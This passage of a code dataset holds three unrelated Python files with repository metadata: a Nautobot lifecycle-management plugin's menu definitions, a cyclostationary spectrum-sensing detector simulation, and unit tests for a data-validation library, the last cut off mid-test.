networktocode-llc/nautobot-plugin-device-lifecycle-mgmt
|
b960a61f8169bcc6667b4e648db4616686e188a0
|
[
"Apache-2.0"
] | null | null | null |
"""Menu items for the Lifecycle Management plugin."""
# pylint: disable=C0412
from nautobot.utilities.choices import ButtonColorChoices
# Prefer the NavMenu* navigation API exported by nautobot.core.apps; when that
# module is unavailable, fall back to the legacy PluginMenu* API below.
try:
    from nautobot.core.apps import NavMenuTab, NavMenuGroup, NavMenuItem, NavMenuButton

    # One "Device Lifecycle" tab, with a NavMenuGroup per lifecycle area.
    # Each item carries its own view permission; each Add/Import button
    # carries the corresponding add permission.
    menu_items = (
        NavMenuTab(
            name="Device Lifecycle",
            weight=600,
            groups=(
                # -- Hardware notices ------------------------------------
                NavMenuGroup(
                    name="Hardware Notices",
                    weight=100,
                    items=(
                        NavMenuItem(
                            link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_list",
                            name="Hardware Notices",
                            buttons=(
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_add",
                                    title="Add",
                                    icon_class="mdi mdi-plus-thick",
                                    button_class=ButtonColorChoices.GREEN,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_hardwarelcm",
                                    ],
                                ),
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_import",
                                    title="Import",
                                    icon_class="mdi mdi-database-import-outline",
                                    button_class=ButtonColorChoices.BLUE,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_hardwarelcm",
                                    ],
                                ),
                            ),
                            permissions=[
                                "nautobot_device_lifecycle_mgmt.view_hardwarelcm",
                            ],
                        ),
                    ),
                ),
                # -- Software + validated software -----------------------
                NavMenuGroup(
                    name="Software Lifecycle",
                    weight=100,
                    items=(
                        NavMenuItem(
                            link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_list",
                            name="Software",
                            buttons=(
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_add",
                                    title="Add",
                                    icon_class="mdi mdi-plus-thick",
                                    button_class=ButtonColorChoices.GREEN,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_softwarelcm",
                                    ],
                                ),
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_import",
                                    title="Import",
                                    icon_class="mdi mdi-database-import-outline",
                                    button_class=ButtonColorChoices.BLUE,
                                    permissions=["nautobot_device_lifecycle_mgmt.add_softwarelcm"],
                                ),
                            ),
                            permissions=[
                                "nautobot_device_lifecycle_mgmt.view_softwarelcm",
                            ],
                        ),
                        NavMenuItem(
                            link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_list",
                            name="Validated Software",
                            buttons=(
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_add",
                                    title="Add",
                                    icon_class="mdi mdi-plus-thick",
                                    button_class=ButtonColorChoices.GREEN,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_validatedsoftwarelcm",
                                    ],
                                ),
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_import",
                                    title="Import",
                                    icon_class="mdi mdi-database-import-outline",
                                    button_class=ButtonColorChoices.BLUE,
                                    permissions=["nautobot_device_lifecycle_mgmt.add_validatedsoftwarelcm"],
                                ),
                            ),
                            permissions=[
                                "nautobot_device_lifecycle_mgmt.view_validatedsoftwarelcm",
                            ],
                        ),
                    ),
                ),
                # -- Contracts / vendors / points of contact -------------
                NavMenuGroup(
                    name="Contracts",
                    weight=100,
                    items=(
                        NavMenuItem(
                            link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_list",
                            name="Contracts",
                            buttons=(
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_add",
                                    title="Add",
                                    icon_class="mdi mdi-plus-thick",
                                    button_class=ButtonColorChoices.GREEN,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_contractlcm",
                                    ],
                                ),
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_import",
                                    title="Import",
                                    icon_class="mdi mdi-database-import-outline",
                                    button_class=ButtonColorChoices.BLUE,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_contractlcm",
                                    ],
                                ),
                            ),
                            permissions=[
                                "nautobot_device_lifecycle_mgmt.view_contractlcm",
                            ],
                        ),
                        NavMenuItem(
                            link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_list",
                            name="Vendors",
                            buttons=(
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_add",
                                    title="Add",
                                    icon_class="mdi mdi-plus-thick",
                                    button_class=ButtonColorChoices.GREEN,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_providerlcm",
                                    ],
                                ),
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_import",
                                    title="Import",
                                    icon_class="mdi mdi-database-import-outline",
                                    button_class=ButtonColorChoices.BLUE,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_providerlcm",
                                    ],
                                ),
                            ),
                            permissions=[
                                "nautobot_device_lifecycle_mgmt.view_providerlcm",
                            ],
                        ),
                        NavMenuItem(
                            link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_list",
                            name="POC",
                            buttons=(
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_add",
                                    title="Add",
                                    icon_class="mdi mdi-plus-thick",
                                    button_class=ButtonColorChoices.GREEN,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_contactlcm",
                                    ],
                                ),
                                NavMenuButton(
                                    link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_import",
                                    title="Import",
                                    icon_class="mdi mdi-database-import-outline",
                                    button_class=ButtonColorChoices.BLUE,
                                    permissions=[
                                        "nautobot_device_lifecycle_mgmt.add_contactlcm",
                                    ],
                                ),
                            ),
                            permissions=[
                                "nautobot_device_lifecycle_mgmt.view_contactlcm",
                            ],
                        ),
                    ),
                ),
                # -- Reports (read-only, no Add/Import buttons) ----------
                NavMenuGroup(
                    name="Reports",
                    weight=100,
                    items=(
                        NavMenuItem(
                            link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftware_device_report",
                            name="Device Software Validation",
                            permissions=[
                                "nautobot_device_lifecycle_mgmt.view_validatedsoftwarelcm",
                            ],
                        ),
                        NavMenuItem(
                            link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftware_inventoryitem_report",
                            name="Inventory Item Software Validation",
                            permissions=[
                                "nautobot_device_lifecycle_mgmt.view_validatedsoftwarelcm",
                            ],
                        ),
                    ),
                ),
            ),
        ),
    )
except ModuleNotFoundError:
    # Legacy navigation API: a flat tuple of PluginMenuItem entries instead of
    # a tab/group hierarchy; buttons use `color=` rather than `button_class=`.
    from nautobot.extras.plugins import PluginMenuItem, PluginMenuButton

    menu_items = (
        PluginMenuItem(
            link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_list",
            link_text="Hardware Notices",
            buttons=(
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_add",
                    title="Add",
                    icon_class="mdi mdi-plus-thick",
                    color=ButtonColorChoices.GREEN,
                    permissions=["nautobot_device_lifecycle_mgmt.add_hardwarelcm"],
                ),
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_import",
                    title="Import",
                    icon_class="mdi mdi-database-import-outline",
                    color=ButtonColorChoices.BLUE,
                    permissions=["nautobot_device_lifecycle_mgmt.add_hardwarelcm"],
                ),
            ),
        ),
        PluginMenuItem(
            link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_list",
            link_text="Contracts",
            buttons=(
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_add",
                    title="Add",
                    icon_class="mdi mdi-plus-thick",
                    color=ButtonColorChoices.GREEN,
                    permissions=["nautobot_device_lifecycle_mgmt.add_contractlcm"],
                ),
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_import",
                    title="Import",
                    icon_class="mdi mdi-database-import-outline",
                    color=ButtonColorChoices.BLUE,
                    permissions=["nautobot_device_lifecycle_mgmt.add_contractlcm"],
                ),
            ),
        ),
        PluginMenuItem(
            link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_list",
            link_text="Vendors",
            buttons=(
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_add",
                    title="Add",
                    icon_class="mdi mdi-plus-thick",
                    color=ButtonColorChoices.GREEN,
                    permissions=["nautobot_device_lifecycle_mgmt.add_providerlcm"],
                ),
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_import",
                    title="Import",
                    icon_class="mdi mdi-database-import-outline",
                    color=ButtonColorChoices.BLUE,
                    permissions=["nautobot_device_lifecycle_mgmt.add_providerlcm"],
                ),
            ),
        ),
        PluginMenuItem(
            link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_list",
            link_text="POC",
            buttons=(
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_add",
                    title="Add",
                    icon_class="mdi mdi-plus-thick",
                    color=ButtonColorChoices.GREEN,
                    permissions=["nautobot_device_lifecycle_mgmt.add_contactlcm"],
                ),
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_import",
                    title="Import",
                    icon_class="mdi mdi-database-import-outline",
                    color=ButtonColorChoices.BLUE,
                    permissions=["nautobot_device_lifecycle_mgmt.add_contactlcm"],
                ),
            ),
        ),
        PluginMenuItem(
            link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_list",
            link_text="Software",
            buttons=(
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_add",
                    title="Add",
                    icon_class="mdi mdi-plus-thick",
                    color=ButtonColorChoices.GREEN,
                    permissions=["nautobot_device_lifecycle_mgmt.add_softwarelcm"],
                ),
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_import",
                    title="Import",
                    icon_class="mdi mdi-database-import-outline",
                    color=ButtonColorChoices.BLUE,
                    permissions=["nautobot_device_lifecycle_mgmt.add_softwarelcm"],
                ),
            ),
        ),
        PluginMenuItem(
            link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_list",
            link_text="Validated Software",
            buttons=(
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_add",
                    title="Add",
                    icon_class="mdi mdi-plus-thick",
                    color=ButtonColorChoices.GREEN,
                    permissions=["nautobot_device_lifecycle_mgmt.add_validatedsoftwarelcm"],
                ),
                PluginMenuButton(
                    link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_import",
                    title="Import",
                    icon_class="mdi mdi-database-import-outline",
                    color=ButtonColorChoices.BLUE,
                    permissions=["nautobot_device_lifecycle_mgmt.add_validatedsoftwarelcm"],
                ),
            ),
        ),
        # Report entries are link-only (no buttons) in the legacy API.
        PluginMenuItem(
            link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftware_device_report",
            link_text="Report: Device OS Validation",
        ),
        PluginMenuItem(
            link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftware_inventoryitem_report",
            link_text="Report: Inventory Item OS Validation",
        ),
    )
| 49.695652
| 113
| 0.434821
| 1,016
| 17,145
| 7.004921
| 0.074803
| 0.153857
| 0.232682
| 0.273149
| 0.893916
| 0.893916
| 0.864409
| 0.839258
| 0.709569
| 0.594633
| 0
| 0.002212
| 0.499096
| 17,145
| 344
| 114
| 49.840116
| 0.826502
| 0.004083
| 0
| 0.899705
| 0
| 0
| 0.285898
| 0.245826
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.115044
| 0
| 0.115044
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
21ef30338c741ccac4af3258c95898a36c5c2acc
| 2,767
|
py
|
Python
|
cyclostationary_detector/cyclostationary_detector_a.py
|
vineeths96/Spectrum-Sensing-for-Cognitive-Radio
|
a280ef512f7a6ed69d284eb7fda26e58c513eb9f
|
[
"MIT"
] | 6
|
2021-05-24T11:02:38.000Z
|
2022-03-04T02:53:49.000Z
|
cyclostationary_detector/cyclostationary_detector_a.py
|
vineeths96/Spectrum-sensing-for-cognitive-radio
|
a280ef512f7a6ed69d284eb7fda26e58c513eb9f
|
[
"MIT"
] | null | null | null |
cyclostationary_detector/cyclostationary_detector_a.py
|
vineeths96/Spectrum-sensing-for-cognitive-radio
|
a280ef512f7a6ed69d284eb7fda26e58c513eb9f
|
[
"MIT"
] | 3
|
2020-11-17T08:43:45.000Z
|
2021-04-05T13:47:07.000Z
|
import numpy as np
import matplotlib.pyplot as plt
from cyclostationary_detector.parameters import *
def generate_statistic_H0(NUM_STATISTICS, sigma_w, N):
    """
    Generate H0 (noise-only) test statistics.

    :param NUM_STATISTICS: Number of statistics to be produced
    :param sigma_w: Std deviation of noise
    :param N: Length of observation vector
    :return: H0 test statistics (complex ndarray of length NUM_STATISTICS)
    """
    # fixed: the `np.complex` alias was removed in NumPy 1.24 -- use builtin complex
    T_y = np.zeros(NUM_STATISTICS, dtype=complex)

    for ind in range(NUM_STATISTICS):
        # complex white Gaussian noise: pairs of reals viewed as one complex sample
        w = sigma_w * np.random.randn(N, 2).view(np.complex128)
        # flatten so y[i] is a scalar (assigning length-1 arrays to array
        # elements is deprecated in NumPy >= 1.25)
        y = w.ravel()

        # Calculate test statistic: correlation between each of the K block
        # repeats and its copy N_d samples later, summed over the N_c lags
        val = 0j
        for n in range(N_c):
            for k in range(K):
                val += y[n + k * (N_c + N_d)] * np.conjugate(y[n + k * (N_c + N_d) + N_d])

        T_y[ind] = 1 / K * val

    return T_y
def generate_statistic_H1(NUM_STATISTICS, sigma_w, N):
    """
    Generate H1 (signal present) test statistics.

    :param NUM_STATISTICS: Number of statistics to be produced
    :param sigma_w: Std deviation of noise
    :param N: Length of observation vector
    :return: H1 test statistics (complex ndarray of length NUM_STATISTICS)
    """
    # fixed: the `np.complex` alias was removed in NumPy 1.24 -- use builtin complex
    T_y = np.zeros(NUM_STATISTICS, dtype=complex)

    for ind in range(NUM_STATISTICS):
        x = sigma_s * np.random.randn(N, 1)
        # copy the tail of each (N_c + N_d)-sample block into its head,
        # producing the cyclostationary repetition the detector exploits
        for k in range(K):
            x[k * (N_c + N_d): k * (N_c + N_d) + N_c] = x[k * (N_c + N_d) + N_d: (k + 1) * (N_c + N_d)]

        # complex white Gaussian noise: pairs of reals viewed as one complex sample
        w = sigma_w * np.random.randn(N, 2).view(np.complex128)
        # flatten so y[i] is a scalar (assigning length-1 arrays to array
        # elements is deprecated in NumPy >= 1.25)
        y = (x + w).ravel()

        # Calculate test statistic: correlation between each of the K block
        # repeats and its copy N_d samples later, summed over the N_c lags
        val = 0j
        for n in range(N_c):
            for k in range(K):
                val += y[n + k * (N_c + N_d)] * np.conjugate(y[n + k * (N_c + N_d) + N_d])

        T_y[ind] = 1 / K * val

    return T_y
def main():
    """Generate H0/H1 test statistics and plot their distributions."""
    N = (K + 1) * (N_c + N_d)
    # noise std deviation from the configured SNR (in dB)
    sigma_w = np.sqrt(sigma_s ** 2 / 10 ** (SNR / 10))

    T_y_0 = generate_statistic_H0(NUM_STATISTICS, sigma_w, N)
    T_y_1 = generate_statistic_H1(NUM_STATISTICS, sigma_w, N)

    def _plot_statistic(T_y, real_title, imag_title, out_file):
        # Two-panel histogram (real / imaginary components), saved then shown.
        plt.figure()
        plt.subplot(211)
        plt.hist(np.real(T_y), bins=125)
        plt.title(real_title)
        plt.subplot(212)
        plt.hist(np.imag(T_y), bins=125)
        plt.title(imag_title)
        plt.tight_layout()
        plt.savefig(out_file)
        plt.show()

    # Plot and save the results for each hypothesis
    _plot_statistic(T_y_0,
                    "$H_{0}$ Statistic distribution - Real component",
                    "$H_{0}$ Statistic distribution - Imaginary component",
                    './results/cyclostationary_detector_a_H0.png')
    _plot_statistic(T_y_1,
                    "$H_{1}$ Statistic distribution - Real component",
                    "$H_{1}$ Statistic distribution - Imaginary component",
                    './results/cyclostationary_detector_a_H1.png')
# Script entry point: run the detector experiment when executed directly.
if __name__ == '__main__':
    main()
| 28.525773
| 103
| 0.612215
| 441
| 2,767
| 3.632653
| 0.204082
| 0.014981
| 0.016854
| 0.022472
| 0.865169
| 0.857678
| 0.832085
| 0.827715
| 0.730337
| 0.730337
| 0
| 0.031174
| 0.258041
| 2,767
| 96
| 104
| 28.822917
| 0.749148
| 0.166968
| 0
| 0.527273
| 1
| 0
| 0.130357
| 0.038393
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.054545
| 0
| 0.145455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0dfc3bc0ce8f4ae17248c3c6ebc92fb2f4f41a12
| 34,197
|
py
|
Python
|
tests/dirty_validators/tests_basic.py
|
alfred82santa/dirty-validators
|
2dd0cdb0da5bc166478667639f0f15c2902b5823
|
[
"MIT"
] | 1
|
2017-04-29T17:22:16.000Z
|
2017-04-29T17:22:16.000Z
|
tests/dirty_validators/tests_basic.py
|
alfred82santa/dirty-validators
|
2dd0cdb0da5bc166478667639f0f15c2902b5823
|
[
"MIT"
] | 8
|
2017-03-27T12:37:49.000Z
|
2020-03-31T11:04:49.000Z
|
tests/dirty_validators/tests_basic.py
|
alfred82santa/dirty-validators
|
2dd0cdb0da5bc166478667639f0f15c2902b5823
|
[
"MIT"
] | null | null | null |
import re
from unittest import TestCase
from dirty_validators.basic import (URI, URL, UUID, AnyOf, BaseValidator,
Email, EqualTo, IPAddress, IsEmpty, IsNone,
Length, MacAddress, NoneOf, NotEmpty,
NotEmptyString, NotEqualTo, NotNone,
NumberRange, Regexp, StringNotContaining)
class TestBaseValidator(TestCase):
    """BaseValidator accepts any value; hide_value controls whether the
    offending value appears in rendered error messages."""

    def setUp(self):
        self.validator = BaseValidator()

    def tearDown(self):
        pass

    def _assert_valid(self, value):
        # The base validator imposes no constraints, so everything validates.
        res = self.validator.is_valid(value)
        self.assertTrue(res)
        self.assertEqual(res.error_messages, [])

    def test_validate_none(self):
        self._assert_valid(None)

    def test_validate_int(self):
        self._assert_valid(3)

    def test_validate_str(self):
        self._assert_valid('aaa')

    def test_validate_dict(self):
        self._assert_valid({})

    def _trigger_error(self, validator, value):
        # Register a templated message, raise the error, return the context.
        code = 'Test key'
        validator.error_messages = {code: "'$value' is the value error to test hidden feature"}
        ctx = validator._build_context(value)
        validator.error(error_code=code, ctx=ctx)
        self.assertFalse(ctx)
        self.assertEqual(len(ctx.error_messages), 1)
        self.assertEqual(ctx.error_messages[0].code, code)
        return ctx

    def test_error_not_hidden_behaviour(self):
        ctx = self._trigger_error(self.validator, 'Not hidden')
        self.assertEqual(ctx.error_messages[0].msg,
                         "'Not hidden' is the value error to test hidden feature")

    def test_error_hidden_behaviour(self):
        ctx = self._trigger_error(BaseValidator(hide_value=True), 'Not hidden')
        self.assertEqual(ctx.error_messages[0].msg,
                         "'**hidden**' is the value error to test hidden feature")
class TestEqualTo(TestCase):
    """EqualTo behaviour, including custom messages, codes and extra values."""

    def _check_success(self, validator, value):
        res = validator.is_valid(value)
        self.assertTrue(res)
        self.assertEqual(res.error_messages, [])

    def _check_failure(self, validator, value, expected_code, expected_msg):
        res = validator.is_valid(value)
        self.assertFalse(res)
        self.assertEqual(len(res.error_messages), 1)
        self.assertEqual(res.error_messages[0].code, expected_code)
        self.assertEqual(res.error_messages[0].msg, expected_msg)

    def test_validate_str_success(self):
        self._check_success(EqualTo(comp_value="aaa"), "aaa")

    def test_validate_str_fail(self):
        self._check_failure(EqualTo(comp_value="aaa"), "aqaa",
                            EqualTo.NOT_EQUAL, "'aqaa' is not equal to 'aaa'")

    def test_validate_int_success(self):
        self._check_success(EqualTo(comp_value=3), 3)

    def test_validate_int_fail(self):
        self._check_failure(EqualTo(comp_value=3), 1,
                            EqualTo.NOT_EQUAL, "'1' is not equal to '3'")

    def test_validate_int_fail_custom_error_message(self):
        validator = EqualTo(comp_value=3,
                            error_messages={EqualTo.NOT_EQUAL: "$value $value aaa $comp_value"})
        self._check_failure(validator, 4, EqualTo.NOT_EQUAL, "4 4 aaa 3")

    def test_validate_int_fail_custom_error_code(self):
        validator = EqualTo(comp_value=3, error_code_map={EqualTo.NOT_EQUAL: "newError"})
        self._check_failure(validator, 4, 'newError', "'4' is not equal to '3'")

    def test_validate_int_fail_custom_error_code_and_error_message(self):
        validator = EqualTo(comp_value=3,
                            error_code_map={EqualTo.NOT_EQUAL: "newError"},
                            error_messages={EqualTo.NOT_EQUAL: "$value $value aaa $comp_value"})
        self._check_failure(validator, 4, 'newError', "4 4 aaa 3")

    def test_validate_int_fail_custom_error_code_error_message_and_custom_value(self):
        validator = EqualTo(comp_value=3,
                            error_code_map={EqualTo.NOT_EQUAL: "newError"},
                            error_messages={EqualTo.NOT_EQUAL:
                                            "$value $value aaa $comp_value $value1 $value2"},
                            message_values={"value1": "aaaaaa1", "value2": "eeeeee1"})
        self._check_failure(validator, 4, 'newError', '4 4 aaa 3 aaaaaa1 eeeeee1')
class TestNotEqualTo(TestCase):
    """NotEqualTo behaviour for matching and non-matching values."""

    def _check_success(self, validator, value):
        res = validator.is_valid(value)
        self.assertTrue(res)
        self.assertEqual(res.error_messages, [])

    def _check_failure(self, validator, value, expected_msg):
        res = validator.is_valid(value)
        self.assertFalse(res)
        self.assertEqual(len(res.error_messages), 1)
        self.assertEqual(res.error_messages[0].code, NotEqualTo.IS_EQUAL)
        self.assertEqual(res.error_messages[0].msg, expected_msg)

    def test_validate_str_success(self):
        self._check_success(NotEqualTo(comp_value="aaa"), 'aqaa')

    def test_validate_str_fail(self):
        self._check_failure(NotEqualTo(comp_value="aaa"), 'aaa',
                            "'aaa' is equal to 'aaa'")

    def test_validate_int_success(self):
        self._check_success(NotEqualTo(comp_value=3), 4)

    def test_validate_int_fail(self):
        self._check_failure(NotEqualTo(comp_value=3), 3,
                            "'3' is equal to '3'")
class TestStringNotContaining(TestCase):
    """StringNotContaining behaviour with and without case sensitivity."""

    def setUp(self):
        self.validator = StringNotContaining(token='Test_TOKEN')

    def test_validate_string_contains(self):
        res = self.validator.is_valid('This string contains Test_TOKEN for sure')
        self.assertFalse(res)
        self.assertEqual(len(res.error_messages), 1)
        self.assertEqual(res.error_messages[0].code, StringNotContaining.NOT_CONTAINS)
        self.assertEqual(res.error_messages[0].msg,
                         "'This string contains Test_TOKEN for sure' contains 'Test_TOKEN'")

    def test_validate_string_not_contains(self):
        # Token differs in case, so the default case-sensitive check passes.
        res = self.validator.is_valid('This string does not contain TESt_TOKEN for sensitive cases')
        self.assertTrue(res)

    def test_validate_string_contains_not_sensitive(self):
        # With case sensitivity off, the differently-cased token is a match.
        self.validator.case_sensitive = False
        res = self.validator.is_valid('This string contains TESt_TOKEN for sensitive cases')
        self.assertFalse(res)
class TestLength(TestCase):
    """Length(min=3, max=6) behaviour on strings, lists, and sizeless values."""

    def setUp(self):
        self.validator = Length(min=3, max=6)

    def tearDown(self):
        pass

    def _check_failure(self, value, expected_code, expected_msg):
        res = self.validator.is_valid(value)
        self.assertFalse(res)
        self.assertEqual(len(res.error_messages), 1)
        self.assertEqual(res.error_messages[0].code, expected_code)
        self.assertEqual(res.error_messages[0].msg, expected_msg)

    def test_validate_str_success(self):
        self.assertTrue(self.validator.is_valid("aqaa"))

    def test_validate_str_fail_short(self):
        self._check_failure("aa", Length.TOO_SHORT,
                            "'aa' is less than 3 unit length")

    def test_validate_str_fail_long(self):
        self._check_failure("aabbnnmm", Length.TOO_LONG,
                            "'aabbnnmm' is more than 6 unit length")

    def test_validate_int_fail(self):
        # Integers have no len(), so the validator reports an invalid type.
        self._check_failure(5, Length.INVALID_TYPE, "'5' has no length")

    def test_validate_list_success(self):
        self.assertTrue(self.validator.is_valid(["1a", "32d", "tr", "wq"]))

    def test_validate_list_fail_short(self):
        self._check_failure(["1a"], Length.TOO_SHORT,
                            "'['1a']' is less than 3 unit length")

    def test_validate_list_fail_long(self):
        self._check_failure(["1a", "32d", "tr", "wq", "qwqw", "dd", "as", "er"],
                            Length.TOO_LONG,
                            "'['1a', '32d', 'tr', 'wq', 'qwqw', 'dd', 'as', 'er']' is more than 6 unit length")
class TestNumberRange(TestCase):
    """NumberRange behaviour with both bounds, or only min / only max set."""

    def setUp(self):
        self.validator = NumberRange(min=3, max=4)

    def tearDown(self):
        pass

    def _check_out_of_range(self, validator, value, expected_msg):
        res = validator.is_valid(value)
        self.assertFalse(res)
        self.assertEqual(len(res.error_messages), 1)
        self.assertEqual(res.error_messages[0].code, NumberRange.OUT_OF_RANGE)
        self.assertEqual(res.error_messages[0].msg, expected_msg)

    def test_validate_int_success(self):
        self.assertTrue(self.validator.is_valid(4))

    def test_validate_int_fail(self):
        self._check_out_of_range(self.validator, 5, "'5' is out of range (3, 4)")

    def test_validate_int_no_min_success(self):
        self.assertTrue(NumberRange(max=4).is_valid(1))

    def test_validate_int_no_min_fail(self):
        # Missing bound is rendered as None in the message.
        self._check_out_of_range(NumberRange(max=4), 5, "'5' is out of range (None, 4)")

    def test_validate_int_no_max_success(self):
        self.assertTrue(NumberRange(min=4).is_valid(5))

    def test_validate_int_no_max_fail(self):
        self._check_out_of_range(NumberRange(min=4), 1, "'1' is out of range (4, None)")
class TestRegexp(TestCase):
    """Tests for the Regexp validator against the pattern '^aa.+bb$'."""

    def setUp(self):
        self.validator = Regexp(regex="^aa.+bb$")

    def tearDown(self):
        pass

    def _assert_not_match(self, result, msg):
        # Helper: a failed match yields exactly one NOT_MATCH error message.
        self.assertFalse(result)
        self.assertEqual(len(result.error_messages), 1)
        self.assertEqual(result.error_messages[0].code, Regexp.NOT_MATCH)
        self.assertEqual(result.error_messages[0].msg, msg)

    def test_validate_str_success(self):
        self.assertTrue(self.validator.is_valid("aarrbb"))

    def test_validate_str_fail(self):
        # Fixed: the original called is_valid("aarrbbcc") twice; a single
        # call is enough to both obtain the result and assert on it.
        result = self.validator.is_valid("aarrbbcc")
        self._assert_not_match(
            result,
            "'aarrbbcc' does not match against pattern '^aa.+bb$'")

    def test_validate_str_case_sensitive_fail(self):
        result = self.validator.is_valid("Aarrbb")
        self._assert_not_match(
            result,
            "'Aarrbb' does not match against pattern '^aa.+bb$'")

    def test_validate_str_case_insensitive_success(self):
        # With IGNORECASE the leading capital no longer breaks the match.
        self.validator = Regexp(regex="^aa.+bb$", flags=re.IGNORECASE)
        self.assertTrue(self.validator.is_valid("Aarrbb"))

    def test_validate_int_fail(self):
        result = self.validator.is_valid(6)
        self._assert_not_match(
            result,
            "'6' does not match against pattern '^aa.+bb$'")
class TestEmail(TestCase):
    """Tests for the Email validator."""

    def setUp(self):
        self.validator = Email()

    def tearDown(self):
        pass

    def _assert_not_mail(self, candidate):
        # A rejected value yields a single NOT_MAIL error naming the value.
        result = self.validator.is_valid(candidate)
        self.assertFalse(result)
        errors = result.error_messages
        self.assertEqual(1, len(errors))
        self.assertEqual(Email.NOT_MAIL, errors[0].code)
        self.assertEqual("'{}' is not a valid email address.".format(candidate),
                         errors[0].msg)

    def test_validate_str_success(self):
        self.assertTrue(self.validator.is_valid("aarrbb@aaaa.com"))

    def test_validate_str_fail(self):
        self._assert_not_mail("aarrbbaaaa@sas.c")

    def test_validate_int_fail(self):
        self._assert_not_mail(4)
class TestIPAddress(TestCase):
    """Tests for the IPAddress validator in ipv4-only, ipv6-only and dual mode."""

    def setUp(self):
        self.validator = IPAddress()

    def _assert_single_error(self, result, code, msg):
        # Every failure case carries exactly one error message.
        self.assertFalse(result)
        self.assertEqual(1, len(result.error_messages))
        self.assertEqual(code, result.error_messages[0].code)
        self.assertEqual(msg, result.error_messages[0].msg)

    def test_validate_str_ipv4_success(self):
        self.assertTrue(self.validator.is_valid("192.168.2.2"))

    def test_validate_str_ipv4_fail(self):
        self._assert_single_error(
            self.validator.is_valid("192.168.2.277"),
            IPAddress.NOT_IP_ADDRESS,
            "'192.168.2.277' does not appear to be a valid IP address. Allowed ipv4")

    def test_validate_str_ipv6_not_allowed_fail(self):
        self._assert_single_error(
            self.validator.is_valid("2001:0db8:85a3:08d3:1319:8a2e:0370:7334"),
            IPAddress.IPV6_NOT_ALLOWED,
            "'2001:0db8:85a3:08d3:1319:8a2e:0370:7334' is "
            "an ipv6 address that is not allowed. Allowed ipv4")

    def test_validate_str_ipv6_success(self):
        self.assertTrue(IPAddress(ipv4=False, ipv6=True).is_valid(
            "2001:0db8:85a3:08d3:1319:8a2e:0370:7334"))

    def test_validate_str_ipv6_reduced_success(self):
        self.assertTrue(IPAddress(ipv4=False, ipv6=True).is_valid(
            "2001:0db8:85a3::8a2e:0370:7334"))

    def test_validate_str_ipv6_reduced_localhost_success(self):
        self.assertTrue(IPAddress(ipv4=False, ipv6=True).is_valid("::1"))

    def test_validate_str_ipv6_fail(self):
        self._assert_single_error(
